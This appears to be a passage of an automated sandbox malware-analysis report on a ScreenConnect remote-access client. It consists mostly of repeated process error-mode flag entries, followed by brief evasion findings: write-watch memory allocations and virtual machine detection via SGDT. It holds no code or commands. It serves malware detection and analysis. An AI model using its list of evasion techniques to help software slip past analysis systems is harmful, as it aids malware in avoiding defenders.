Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 1AC33630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 1AC4D030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Memory allocated: 11F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Memory allocated: 1AE90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Memory allocated: DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Memory allocated: 28F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Memory allocated: E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Memory allocated: CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Memory allocated: 13C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Memory allocated: 11D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Memory allocated: B20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Memory allocated: 1A3C0000 memory reserve \| memory write watch

Contains functionality to detect virtual machines (SGDT)

